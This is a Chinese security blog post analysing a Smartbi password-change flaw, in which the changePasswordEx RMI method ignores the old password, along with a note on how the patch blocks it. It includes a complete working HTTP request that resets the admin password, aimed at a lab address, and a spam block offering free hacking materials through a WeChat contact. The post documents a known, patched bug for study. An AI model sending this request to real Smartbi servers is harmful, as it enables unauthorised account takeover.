Smartbi 修改用户密码漏洞

原创
08/15 17:12
阅读数 69

漏洞简介

通过查看 Smartbi 的补丁包信息,发现存在漏洞在某种特定情况下修改用户的密码,进行简单的复现和分析

image

漏洞复现

在页面上修改密码时,需要知道原本的用户对应的密码

image

image

image

直接构造这样的数据包,就不需要知道原本的密码,知道用户名就可以修改密码

POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close

className=UserService&methodName=changePasswordEx&params=["admin","","1"]

image​​image

漏洞分析

smartbi.usermanager.ILocalUserManagerModule#changePasswordEx

image

smartbi.usermanager.UserManagerModule#changePasswordEx

image

 

修改密码的操作虽然获取了用户名 原本的密码 修改后的新密码,但是对原本的密码并没有做任何校验处理

【---- 帮助网安学习,以下所有学习资料免费领!领取资料加 we~@x:yj009991,备注 “开源中国” 获取!】

① 网安学习成长路径思维导图
② 60 + 网安经典常用工具包
③ 100+SRC 漏洞分析报告
④ 150 + 网安攻防实战技术电子书
⑤ 最权威 CISSP 认证考试指南 + 题库
⑥ 超 1800 页 CTF 实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP 客户端安全检测指南(安卓 + IOS)

userId 是根据传入的用户名查询到的

smartbi.usermanager.UserManagerModule#updateUserEx

imagesmartbi.usermanager.UserManagerModule#updateUserExtend

image

漏洞修复

上传补丁包后再发送数据包,发现被拦截

image

image

image

匹配到对应的类名和方法就结束执行

更多靶场实验练习、网安学习资料,请点击这里 >> 

 

展开阅读全文
加载中
点击引领话题📣 发布并加入讨论🔥
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部